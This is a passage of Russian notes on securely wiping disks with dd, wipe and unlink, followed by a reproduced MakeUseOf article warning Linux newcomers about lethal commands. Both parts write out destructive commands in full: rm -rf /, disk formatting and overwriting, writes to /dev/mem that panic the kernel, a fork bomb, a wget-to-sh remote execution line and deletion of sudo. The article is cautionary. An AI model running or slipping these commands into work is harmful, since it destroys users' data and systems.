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Помимо rm -rf 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 if=/dev/zero of=/dev/hda bs=1M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Медленно только эта команда работает.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посмотреть сколько уже завершено нужно послать сигнал USR1 номеру процесса под которым выполняется dd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 -s USR1 pid_процесса_dd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Будет что-то типа такого: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18220+0 records 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18220+0 records out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19105054720 bytes (19 GB) copied, 838,773 s, 22,8 MB/s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 if=/dev/urandom of=/dev/sda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это долго очень.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ещё утилита удаления файлов.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есть пакет wipe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app-misc/wipe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Available versions:  2.2.0 2.2.0[1] 2.2.0[2] 2.2.20050509 2.2.20050509[1]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Homepage:            http://wipe.sourceforge.net/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Description:         Secure file wiping utility based on Peter Gutman's patterns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интересная команда unlink которая похоже тоже может ушатывать наглухо файлы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её можно использовать с командой, которая выдаёт список файлов, например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qlist netplug | xargs -nl unlink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Угрохает все файлы принадлежащие пакету netplug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 ещё вызывалась команда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 -C netplug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 Lethal Linux Commands You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Should Never Run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Joel Lee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the original article here: http://www.makeuseof.com/tag/9-lethal-linux-commands-never-run/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can be a double-edged sword. It assumes that you know what you’re doing and gives you the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freedom to do whatever you want. It won’t question you. This is convenient when you actually know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you’re doing, but it also means that you could conceivably render your system unusable within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seconds.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to the Linux command line? No worries. Get started with our Linux terminal quickstart guide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along with these 40 essential Linux commands. With those two resources, you’ll familiarize yourself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 command line in no time.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whether you’re a Linux newbie or veteran, you should never run a command unless you know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exactly what it does. Here are some of the deadliest Linux commands that you’ll, for the most part,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want to avoid.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Delete Recursively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Linux ability to delete anything you want without question is a godsend, especially after dealing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years of “That file can’t be deleted” errors in Windows. But Internet trolls will be quick to deceive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you, presenting you with extremely dangerous removal commands that can wipe entire hard drives.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 -rf /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line executes the remove command rm with two toggles: -r which forces recursive deletion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through all subdirectories and -f which forces deletion of read-only files without confirmation. The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 is executed on the / root directory, essentially wiping your whole system clean.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Note, these days on most Linux systems if you tried doing this you’d get a warning. But the warning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isn’t guaranteed, so just don’t do it.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 Hard Drive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terminal is especially tricky for Linux newbies because it provides several ways to accidentally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wipe one’s hard drive. Recursive deletion is a big one, but here’s another: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mkfs.ext3 /dev/hda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command formats the hard drive to use the ext3 filesystem. Disk drive formatting is not an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inherently malicious action, but it does “reset” the drive such that it’s “as good as new”. In other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words, a formatted hard drive is like a blank slate.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Formatting is useful for disk partitions and external drives, but executing it on an entire hard drive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(such as /dev/hda) is dangerous and can leave your system in an unrecoverable state.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2014, MakeUseOf. All Rights Reserved ®.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Overwrite Hard Drive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if accidental disk formatting wasn’t bad enough, it’s possible to overwrite your hard drive using raw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data. At least disk formatting is an actual procedure with real-life uses; directly overwriting one’s drive,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the other hand, is not so great.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&gt; /dev/hda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the command above, command can be replaced by any Bash command. The &gt; operator redirects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output from the command on its left to the file on its right. In this case, it doesn’t matter what the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of the left command is. That raw data is being redirected and used to overwrite the system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hard drive.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you can imagine, this renders it useless.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Wipe Hard Drive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Here’s another way to ruin your system. This time around, the command will completely zero out your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hard drive. No data corruptions or overwrites; it will literally fill your hard drive with zeroes. A hard drive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doesn’t get any more wiped than that.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 if=/dev/zero of=/dev/hda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dd command is a low-level instruction that’s mostly used to write data to physical drives. The if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 determines the source of data, which in this case is /dev/zero, a special on Linux that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produces an infinite stream of zeroes. The of parameter determines the destination of those zeroes,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is the /dev/hda drive.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Yes, there are legitimate reasons for zeroing a drive, but if you don’t know what those reasons are,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you’ll want to stay away from this command.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Implode Hard Drive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you’re tired of hearing ways to wreck your hard drive, hang on. Here’s one more for you. On Linux,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there’s a special file called /dev/null that will discard whatever data is written to it. You can think of it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a black hole or a file shredder: anything given to it as input will be eaten up for good.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 / /dev/null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 you spot the danger here? The mv command tries to move the system’s root directory / into the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 hole of /dev/null. This is a valid command and the result is devastating: the hard drive gets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eaten up and there’s nothing left. Doing this will make your system unusable.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2014, MakeUseOf. All Rights Reserved ®.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Cause Kernel Panic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Windows has its infamous Blue Screen of Death. And despite the myths that float around, Linux is not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perfectly secure system. Sometimes, an internal error occurs from which recovery is impossible, so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will enact something similar to the Blue Screen: a kernel panic.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 if=/dev/random of=/dev/port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1 &gt; /proc/sys/kernel/panic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 /dev/port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 /dev/zero &gt; /dev/mem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intricacies of the above commands aren’t important here. What is important is that running any of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those lines will result in a kernel panic, forcing you to reboot your system. It’s best to stay away from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commands unless you’re absolutely sure you know what you’re doing.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Fork Bomb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Bash is the language of the Linux terminal and it’s powerful. Not only can it run commands but it can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also run functions, which makes it easy to write scripts that can automate system tasks.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Unfortunately, functions don’t come without their own set of risks.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:(){:|:&amp;};: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obscure command is called a fork bomb, which is a special type of kernel panic. It defines a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named : that recursively calls itself twice when executed. One of the recursive calls happens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the foreground while the other happens in the background.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other words, whenever this function executes, it spawns two child processes. Those child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processes spawn their own child processes, and this cycle keeps going in an infinite loop. The only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way out of it is to reboot the system.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Execute Remote Script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Here’s an innocent command that can actually be useful in day-to-day life on a Linux system. wget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retrieves the contents of a web URL, which can be used to access websites or download files.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However, there’s a simple trick that turns it dangerous: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wget http://an-untrusted-url -O- | sh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combination downloads the contents of the given URL and immediately feeds it to the sh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command, which executes the downloaded contents in the terminal. If the URL were to point to a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malicious script, you’d be sealing your own fate with this command.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2014, MakeUseOf. All Rights Reserved ®.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 Root Command Rights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final command is straightforward. It utilizes the commonly used rm command to disable two of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most important commands on Linux: sudo and su. Long story short, these two allow you to run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commands with root permissions. Without them, life on Linux would be miserable.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 -f /usr/bin/sudo;rm -f /bin/su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is why you shouldn’t run this command. It force deletes both commands from your system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without any confirmation, leaving you in a jam. There are ways to restore what you’ve deleted, but it’s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always straightforward nor will it be pleasant.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Please, be careful! Don’t be afraid to play around with Linux and the command line terminal, but at the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same time, do your research and never execute anything unless you’re absolutely sure what it does. If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someone tells you to “try this command”, always double- and triple-check it.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Have you ever run a destructive command? What happened? Did someone trick you into it? Share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thoughts and experiences with us in the comments!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more stories like this at MakeUseOf.com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2014, MakeUseOf. All Rights Reserved ®.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